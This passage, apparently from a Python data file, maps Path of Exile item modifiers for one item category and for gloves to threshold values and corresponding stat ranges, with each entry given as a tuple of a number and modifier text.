"+#% to Cold Damage over Time Multiplier": [(45, '(9 - 10) to Cold Damage over Time Multiplier'), (90, '(11 - 12) to Cold Damage over Time Multiplier'), (500, '(13 - 15) to Cold Damage over Time Multiplier')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(200, 'Adds (4 - 9) to (11 - 21) Chaos Damage'), (320, 'Adds (10 - 18) to (22 - 34) Chaos Damage'), (1000, 'Adds (19 - 28) to (35 - 49) Chaos Damage')],
"Adds # to # Cold Damage": [(50, 'Adds (3 - 6) to (7 - 11) Cold Damage'), (100, 'Adds (7 - 10) to (12 - 18) Cold Damage'), (150, 'Adds (11 - 15) to (19 - 26) Cold Damage'), (200, 'Adds (16 - 20) to (27 - 35) Cold Damage'), (1000, 'Adds (21 - 25) to (36 - 43) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(60, 'Adds (3 - 5) to (5 - 8) Cold Damage to Spells'), (120, 'Adds (5 - 7) to (9 - 13) Cold Damage to Spells'), (160, 'Adds (8 - 11) to (14 - 19) Cold Damage to Spells'), (180, 'Adds (12 - 14) to (19 - 25) Cold Damage to Spells'), (1000, 'Adds (15 - 18) to (26 - 31) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(80, 'Adds (4 - 8) to (9 - 15) Fire Damage'), (160, 'Adds (9 - 12) to (16 - 23) Fire Damage'), (210, 'Adds (13 - 18) to (24 - 31) Fire Damage'), (250, 'Adds (19 - 24) to (32 - 43) Fire Damage'), (1000, 'Adds (25 - 30) to (44 - 53) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(75, 'Adds (3 - 6) to (7 - 11) Fire Damage to Spells'), (150, 'Adds (7 - 9) to (12 - 17) Fire Damage to Spells'), (200, 'Adds (10 - 13) to (17 - 22) Fire Damage to Spells'), (230, 'Adds (14 - 17) to (23 - 31) Fire Damage to Spells'), (1000, 'Adds (18 - 21) to (31 - 38) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(150, 'Adds 1 to (16 - 25) Lightning Damage'), (300, 'Adds (1 - 2) to (26 - 40) Lightning Damage'), (375, 'Adds (1 - 3) to (41 - 55) Lightning Damage'), (430, 'Adds (2 - 5) to (56 - 70) Lightning Damage'), (1000, 'Adds (2 - 6) to (71 - 83) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(100, 'Adds 1 to (12 - 18) Lightning Damage to Spells'), (200, 'Adds (1 - 2) to (19 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 39) Lightning Damage to Spells'), (370, 'Adds (2 - 4) to (40 - 49) Lightning Damage to Spells'), (1000, 'Adds (2 - 5) to (50 - 59) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(40, 'Adds 1 to 2 Physical Damage'), (80, 'Adds (2 - 3) to (3 - 4) Physical Damage'), (120, 'Adds (3 - 4) to (5 - 6) Physical Damage'), (135, 'Adds (5 - 6) to (7 - 8) Physical Damage'), (500, 'Adds (6 - 7) to (9 - 10) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(15 - 17)% increased Chaos Damage'), (44, '(18 - 20)% increased Chaos Damage'), (100, '(21 - 23)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(17 - 19)% increased Elemental Damage'), (44, '(20 - 22)% increased Elemental Damage'), (100, '(23 - 26)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(3, 'You and Allies affected by your Aura Skills deal (7 - 9)% increased Damage'), (5, 'You and Allies affected by your Aura Skills deal (10 - 12)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (13 - 15)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(18 - 20)% increased Chaos Damage'), (22, '(21 - 23)% increased Chaos Damage'), (50, '(24 - 26)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(11, '(21 - 23)% increased Cold Damage'), (22, '(24 - 26)% increased Cold Damage'), (50, '(27 - 30)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(11, '(21 - 23)% increased Lightning Damage'), (22, '(24 - 26)% increased Lightning Damage'), (50, '(27 - 30)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Cold Damage'), (32, '(24 - 26)% increased Cold Damage'), (100, '(27 - 30)% increased Cold Damage\nGain (4 - 6)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Fire Damage'), (32, '(24 - 26)% increased Fire Damage'), (100, '(27 - 30)% increased Fire Damage\nGain (4 - 6)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Lightning Damage'), (32, '(24 - 26)% increased Lightning Damage'), (100, '(27 - 30)% increased Lightning Damage\nGain (4 - 6)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(5, '(15 - 17)% increased Chaos Damage'), (10, '(18 - 20)% increased Chaos Damage'), (50, '(21 - 23)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(16, '(19 - 22)% increased Global Physical Damage'), (32, '(23 - 26)% increased Global Physical Damage'), (100, '(27 - 30)% increased Global Physical Damage\nGain (4 - 6)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(44, '(23 - 26)% increased Attack Damage'), (88, '(27 - 30)% increased Attack Damage'), (200, '(31 - 35)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(44, '(23 - 26)% increased Spell Damage'), (88, '(27 - 30)% increased Spell Damage'), (200, '(31 - 35)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(15 - 17)% increased Chaos Damage'), (2, '(18 - 20)% increased Chaos Damage'), (10, '(21 - 23)% increased Chaos Damage')],
},
"Gloves": {
"# Life Regenerated per second": [(16.67, '(5.0 - 7.0) Life Regenerated per second'), (29.17, '(7.02 - 11.67) Life Regenerated per second'), (41.67, '(11.68 - 18.33) Life Regenerated per second'), (50.0, '(18.35 - 26.67) Life Regenerated per second'), (54.17, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second'), (58.33, '(26.68 - 40.0) Life Regenerated per second\n(0.8 - 0.93)% of Life Regenerated per second'), (83.33, '(26.68 - 40.0) Life Regenerated per second\n1.0% of Life Regenerated per second')],
"#% additional Physical Damage Reduction while Focussed": [(30, '(-15 - -11) Physical Damage taken from Attacks'), (50, '(-20 - -16) Physical Damage taken from Attacks')],
"#% chance to Avoid Elemental Ailments": [(30, '(15 - 20)% reduced Elemental Ailment Duration on you'), (60, '(21 - 35)% reduced Elemental Ailment Duration on you'), (200, '(36 - 50)% reduced Elemental Ailment Duration on you\n(16 - 25)% chance to Avoid Elemental Ailments')],
"#% chance to Avoid being Stunned": [(40, '(10 - 11)% chance to Avoid being Stunned'), (80, '(12 - 13)% chance to Avoid being Stunned'), (200, '(14 - 15)% chance to Avoid being Stunned')],
"#% increased Armour": [(100, '(15 - 18)% increased Armour'), (175, '(19 - 22)% increased Armour'), (250, '(23 - 26)% increased Armour'), (325, '(27 - 30)% increased Armour'), (400, '(30 - 35)% increased Armour'), (1000, '(4 - 5)% Chance to Block Attack Damage\n2% Chance to Block Spell Damage')],
"#% increased Armour and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(23 - 25)% increased Energy Shield'), (1000, '(4 - 5)% Chance to Block Attack Damage\n2% Chance to Block Spell Damage\nVitality has 10% reduced Mana Reservation\nDetermination has 10% reduced Mana Reservation\nGrace has 10% reduced Mana Reservation\nDiscipline has 10% reduced Mana Reservation\nPurity of Fire has 10% reduced Mana Reservation\nPurity of Ice has 10% reduced Mana Reservation\nPurity of Lightning has 10% reduced Mana Reservation')],
"#% increased Armour and Evasion": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating'), (1000, '(4 - 5)% Chance to Block Attack Damage\n2% Chance to Block Spell Damage\n2% chance to Dodge Attack Hits\n2% chance to Dodge Spell Hits')],
"#% increased Armour, Evasion and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '(4 - 5)% Chance to Block Attack Damage\n2% Chance to Block Spell Damage\n2% chance to Dodge Attack Hits\n2% chance to Dodge Spell Hits\nVitality has 10% reduced Mana Reservation\nDetermination has 10% reduced Mana Reservation\nGrace has 10% reduced Mana Reservation\nDiscipline has 10% reduced Mana Reservation\nPurity of Fire has 10% reduced Mana Reservation\nPurity of Ice has 10% reduced Mana Reservation\nPurity of Lightning has 10% reduced Mana Reservation')],
"#% increased Attack Speed": [(30, '3% increased Attack Speed'), (45, '4% increased Attack Speed'), (100, '5% increased Attack Speed')],
"#% increased Attack and Cast Speed if you've Hit an Enemy Recently": [(11, '3% increased Attack and Cast Speed'), (22, '4% increased Attack and Cast Speed'), (50, '5% increased Attack and Cast Speed')],
"#% increased Attack and Cast Speed while Focussed": [(90, '3% increased Attack and Cast Speed'), (200, '4% increased Attack and Cast Speed')],
"#% increased Brand Attachment range": [(30, '(2 - 3)% increased Brand Attachment range'), (100, '(4 - 5)% increased Brand Attachment range')],
"#% increased Damage during any Flask Effect": [(70, '(10 - 12)% increased Damage during any Flask Effect'), (150, '(13 - 15)% increased Damage during any Flask Effect')],
"#% increased Damage while Leeching": [(100, '(10 - 12)% increased Damage while Leeching'), (200, '(13 - 15)% increased Damage while Leeching')],
"#% increased Elemental Damage if you've dealt a Critical Strike Recently": [(30, '(11 - 12)% increased Elemental Damage'), (60, '(13 - 14)% increased Elemental Damage'), (100, '(15 - 16)% increased Elemental Damage')],
"#% increased Energy Shield": [(100, '(15 - 16)% increased Energy Shield'), (175, '(17 - 18)% increased Energy Shield'), (250, '(19 - 20)% increased Energy Shield'), (325, '(21 - 22)% increased Energy Shield'), (400, '(23 - 25)% increased Energy Shield'), (1000, 'Vitality has 10% reduced Mana Reservation\nDetermination has 10% reduced Mana Reservation\nGrace has 10% reduced Mana Reservation\nDiscipline has 10% reduced Mana Reservation\nPurity of Fire has 10% reduced Mana Reservation\nPurity of Ice has 10% reduced Mana Reservation\nPurity of Lightning has 10% reduced Mana Reservation')],
"#% increased Evasion Rating": [(100, '(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Evasion Rating'), (1000, '2% chance to Dodge Attack Hits\n2% chance to Dodge Spell Hits')],
"#% increased Evasion and Energy Shield": [(100, '(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '2% chance to Dodge Attack Hits\n2% chance to Dodge Spell Hits\nVitality has 10% reduced Mana Reservation\nDetermination has 10% reduced Mana Reservation\nGrace has 10% reduced Mana Reservation\nDiscipline has 10% reduced Mana Reservation\nPurity of Fire has 10% reduced Mana Reservation\nPurity of Ice has 10% reduced Mana Reservation\nPurity of Lightning has 10% reduced Mana Reservation')],
"#% increased Global Critical Strike Chance": [(30, '(14 - 15)% increased Global Critical Strike Chance'), (60, '(16 - 17)% increased Global Critical Strike Chance'), (100, '(18 - 20)% increased Global Critical Strike Chance')],
"#% increased Rarity of Items found": [(30, '(10 - 11)% increased Rarity of Items found'), (60, '(12 - 13)% increased Rarity of Items found'), (90, '(14 - 15)% increased Rarity of Items found'), (120, '(16 - 17)% increased Rarity of Items found'), (145, '(18 - 20)% increased Rarity of Items found'), (200, '(1 - 3)% increased Quantity of Items found')],
"#% increased Stun and Block Recovery": [(30, '(10 - 12)% increased Stun and Block Recovery'), (60, '(13 - 15)% increased Stun and Block Recovery'), (90, '(16 - 18)% increased Stun and Block Recovery'), (110, '(19 - 21)% increased Stun and Block Recovery'), (130, '(22 - 25)% increased Stun and Block Recovery'), (160, '(14 - 15)% chance to Avoid being Stunned')],
"#% increased Vaal Skill Critical Strike Chance": [(170, '(21 - 30)% increased Vaal Skill Critical Strike Chance'), (340, '(31 - 40)% increased Vaal Skill Critical Strike Chance'), (500, '(5 - 7)% increased Attack and Cast Speed if Corrupted')],
"#% of Life Regenerated per second": [(1.17, '(11.68 - 18.33) Life Regenerated per second'), (2.33, '(18.35 - 26.67) Life Regenerated per second'), (5.0, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '0.4% of Physical Attack Damage Leeched as Life\n10% increased Maximum total Recovery per second from Life Leech')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.3% of Physical Attack Damage Leeched as Mana\n10% increased Maximum total Recovery per second from Mana Leech')],
"#% of Physical Damage Converted to Cold Damage": [(35, '8% increased Cold Damage'), (72, '(9 - 10)% increased Cold Damage'), (100, '(11 - 12)% increased Cold Damage\n(7 - 10)% of Physical Damage Converted to Cold Damage')],
"#% of Physical Damage Converted to Fire Damage": [(35, '8% increased Fire Damage'), (72, '(9 - 10)% increased Fire Damage'), (100, '(11 - 12)% increased Fire Damage\n(7 - 10)% of Physical Damage Converted to Fire Damage')],
"#% of Physical Damage Converted to Lightning Damage": [(35, '8% increased Lightning Damage'), (72, '(9 - 10)% increased Lightning Damage'), (100, '(11 - 12)% increased Lightning Damage\n(7 - 10)% of Physical Damage Converted to Lightning Damage')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(5 - 10)% chance to gain a Frenzy Charge on Kill')],
"#% reduced Elemental Ailment Duration on you": [(40, '(15 - 20)% reduced Elemental Ailment Duration on you'), (75, '(21 - 35)% reduced Elemental Ailment Duration on you'), (200, '(36 - 50)% reduced Elemental Ailment Duration on you')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (6, '(6 - 8) Life gained for each Enemy hit by your Attacks')],
"+# Life gained on Kill": [(15, '(6 - 8) Life gained on Kill'), (25, '(9 - 11) Life gained on Kill'), (35, '(12 - 15) Life gained on Kill'), (100, '(12 - 15) Life gained on Kill\nRecover (1 - 2)% of Maximum Life on Kill')],
"+# Mana gained for each Enemy hit by your Attacks": [(5, '2 Mana gained for each Enemy hit by your Attacks'), (10, '3 Mana gained for each Enemy hit by your Attacks'), (50, '4 Mana gained for each Enemy hit by your Attacks')],
"+# Mana gained on Kill": [(5, '3 Mana gained on Kill'), (10, '4 Mana gained on Kill'), (15, '5 Mana gained on Kill'), (50, '5 Mana gained on Kill\nRecover (1 - 2)% of Maximum Mana on Kill')],
"+# to Accuracy Rating": [(250, '(10 - 11)% increased Global Accuracy Rating'), (500, '(12 - 13)% increased Global Accuracy Rating'), (750, '(14 - 15)% increased Global Accuracy Rating'), (1000, '(16 - 17)% increased Global Accuracy Rating'), (1400, '(18 - 20)% increased Global Accuracy Rating'), (2000, '(18 - 20)% increased Global Accuracy Rating\n(150 - 250) to Accuracy Rating')],
"+# to Armour": [(40, '(15 - 20) to Armour'), (80, '(21 - 30) to Armour'), (110, '(31 - 40) to Armour'), (150, '(41 - 55) to Armour'), (200, '(56 - 70) to Armour'), (250, '(56 - 70) to Armour\n2% additional Physical Damage Reduction'), (1000, '(56 - 70) to Armour\n3% additional Physical Damage Reduction')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, '(18 - 20) to Dexterity\n1 to Maximum Frenzy Charges')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating": [(35, '(15 - 20) to Evasion Rating'), (75, '(21 - 30) to Evasion Rating'), (105, '(31 - 40) to Evasion Rating'), (145, '(41 - 55) to Evasion Rating'), (195, '(56 - 70) to Evasion Rating'), (245, '(56 - 70) to Evasion Rating\n2 chance to Evade Attacks'), (1000, '(56 - 70) to Evasion Rating\n3 chance to Evade Attacks')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, '(18 - 20) to Intelligence\n5% increased Intelligence')],
"+# to Level of Socketed AoE Gems": [(2, '(2 - 3) to Quality of Socketed AoE Gems'), (5, '(4 - 6) to Quality of Socketed AoE Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Melee Gems": [(2, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems')],
"+# to Level of Socketed Projectile Gems": [(2, '(2 - 3) to Quality of Socketed Projectile Gems'), (5, '(4 - 6) to Quality of Socketed Projectile Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, '(18 - 20) to Strength\n5% increased Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Energy Shield": [(50, '(8 - 10) to maximum Energy Shield'), (75, '(11 - 14) to maximum Energy Shield'), (100, '(15 - 18) to maximum Energy Shield'), (125, '(19 - 23) to maximum Energy Shield'), (150, '(24 - 30) to maximum Energy Shield'), (175, '(24 - 30) to maximum Energy Shield\n(0.6 - 0.7)% of Energy Shield Regenerated per second'), (500, '(24 - 30) to maximum Energy Shield\n(0.8 - 0.9)% of Energy Shield Regenerated per second')],
"+# to maximum Life": [(100, '(8 - 10) to maximum Life'), (175, '(11 - 14) to maximum Life'), (250, '(15 - 19) to maximum Life'), (325, '(20 - 24) to maximum Life'), (400, '(25 - 30) to maximum Life\n4% increased maximum Life'), (1000, '(5 - 6)% increased maximum Life')],
"+# to maximum Mana": [(70, '(8 - 10) to maximum Mana'), (125, '(11 - 14) to maximum Mana'), (175, '(15 - 19) to maximum Mana'), (230, '(20 - 24) to maximum Mana'), (280, '(25 - 30) to maximum Mana\n6% increased maximum Mana'), (335, '(7 - 8)% increased maximum Mana'), (500, '(9 - 10)% increased maximum Mana')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (100, '(9 - 10) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance\n1 to maximum Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (140, '(15 - 16) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance\n1 to maximum Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (140, '(15 - 16) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance\n1 to maximum Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (140, '(15 - 16) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance\n1 to maximum Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"Adds # to # Chaos Damage": [(40, '(11 - 12)% increased Chaos Damage'), (80, '(13 - 14)% increased Chaos Damage'), (200, '(15 - 16)% increased Chaos Damage')],
"Adds # to # Chaos Damage to Attacks": [(25, '8% increased Chaos Damage'), (45, '(9 - 10)% increased Chaos Damage'), (100, '(11 - 12)% increased Chaos Damage')],
"Adds # to # Cold Damage": [(45, '(11 - 12)% increased Cold Damage'), (90, '(13 - 14)% increased Cold Damage'), (200, '(15 - 16)% increased Cold Damage')],
"Adds # to # Cold Damage to Attacks": [(15, '8% increased Cold Damage'), (22, '(9 - 10)% increased Cold Damage'), (33, '(11 - 12)% increased Cold Damage'), (42, '(13 - 14)% increased Cold Damage'), (100, '(15 - 16)% increased Cold Damage\n(15 - 25)% of Physical Damage Converted to Cold Damage\nCurse Enemies with Level 8 Frostbite on Hit')],
"Adds # to # Fire Damage": [(45, '(11 - 12)% increased Fire Damage'), (90, '(13 - 14)% increased Fire Damage'), (200, '(15 - 16)% increased Fire Damage')],
"Adds # to # Fire Damage to Attacks": [(15, '8% increased Fire Damage'), (25, '(9 - 10)% increased Fire Damage'), (35, '(11 - 12)% increased Fire Damage'), (45, '(13 - 14)% increased Fire Damage'), (100, '(15 - 16)% increased Fire Damage\n(15 - 25)% of Physical Damage Converted to Fire Damage\nCurse Enemies with Level 8 Flammability on Hit')],
"Adds # to # Lightning Damage": [(100, '(11 - 12)% increased Lightning Damage'), (160, '(13 - 14)% increased Lightning Damage'), (200, '(15 - 16)% increased Lightning Damage')],
"Adds # to # Lightning Damage to Attacks": [(30, '8% increased Lightning Damage'), (45, '(9 - 10)% increased Lightning Damage'), (60, '(11 - 12)% increased Lightning Damage'), (75, '(13 - 14)% increased Lightning Damage'), (100, '(15 - 16)% increased Lightning Damage\n(15 - 25)% of Physical Damage Converted to Lightning Damage\nCurse Enemies with Level 8 Conductivity on Hit')],
"Adds # to # Physical Damage": [(20, '(11 - 12)% increased Global Physical Damage'), (30, '(13 - 14)% increased Global Physical Damage'), (200, '(15 - 16)% increased Global Physical Damage')],
